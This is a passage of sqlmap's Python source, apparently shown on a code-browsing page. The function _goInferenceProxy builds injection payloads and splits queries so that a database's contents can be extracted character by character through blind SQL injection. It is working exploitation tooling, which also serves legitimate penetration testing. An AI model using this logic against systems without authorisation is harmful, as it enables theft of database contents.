Retrieve the output of a SQL query characted by character taking advantage of an blind SQL injection vulnerability on the affected parameter through a bisection algorithm.
(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False)
| 161 | return outputs |
| 162 | |
| 163 | def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, charsetType=None, firstChar=None, lastChar=None, dump=False): |
| 164 | """ |
| 165 | Retrieve the output of a SQL query characted by character taking |
| 166 | advantage of an blind SQL injection vulnerability on the affected |
| 167 | parameter through a bisection algorithm. |
| 168 | """ |
| 169 | |
| 170 | initTechnique(getTechnique()) |
| 171 | |
| 172 | query = agent.prefixQuery(getTechniqueData().vector) |
| 173 | query = agent.suffixQuery(query) |
| 174 | payload = agent.payload(newValue=query) |
| 175 | count = None |
| 176 | startLimit = 0 |
| 177 | stopLimit = None |
| 178 | outputs = BigArray() |
| 179 | |
| 180 | if not unpack: |
| 181 | return _goInference(payload, expression, charsetType, firstChar, lastChar, dump) |
| 182 | |
| 183 | _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression) |
| 184 | |
| 185 | rdbRegExp = re.search(r"RDB\$GET_CONTEXT\([^)]+\)", expression, re.I) |
| 186 | if rdbRegExp and Backend.isDbms(DBMS.FIREBIRD): |
| 187 | expressionFieldsList = [expressionFields] |
| 188 | |
| 189 | if len(expressionFieldsList) > 1: |
| 190 | infoMsg = "the SQL query provided has more than one field. " |
| 191 | infoMsg += "sqlmap will now unpack it into distinct queries " |
| 192 | infoMsg += "to be able to retrieve the output even if we " |
| 193 | infoMsg += "are going blind" |
| 194 | logger.info(infoMsg) |
| 195 | |
| 196 | # If we have been here from SQL query/shell we have to check if |
| 197 | # the SQL query might return multiple entries and in such case |
| 198 | # forge the SQL limiting the query output one entry at a time |
| 199 | # NOTE: we assume that only queries that get data from a table |
| 200 | # can return multiple entries |
| 201 | if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I) and hasattr(queries[Backend.getIdentifiedDbms()].limitregexp, "query"): |
| 202 | expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) |
| 203 | |
| 204 | if limitCond: |
| 205 | test = True |
| 206 | |
| 207 | if stopLimit is None or stopLimit <= 1: |
| 208 | if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): |
| 209 | test = False |
| 210 | |
| 211 | if test: |
| 212 | # Count the number of SQL query entries output |
| 213 | countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] |
| 214 | countedExpression = expression.replace(expressionFields, countFirstField, 1) |
| 215 | |
| 216 | if " ORDER BY " in countedExpression.upper(): |
| 217 | _ = countedExpression.upper().rindex(" ORDER BY ") |
| 218 | countedExpression = countedExpression[:_] |
| 219 | |
| 220 | if not stopLimit: |
no test coverage detected
searching dependent graphs…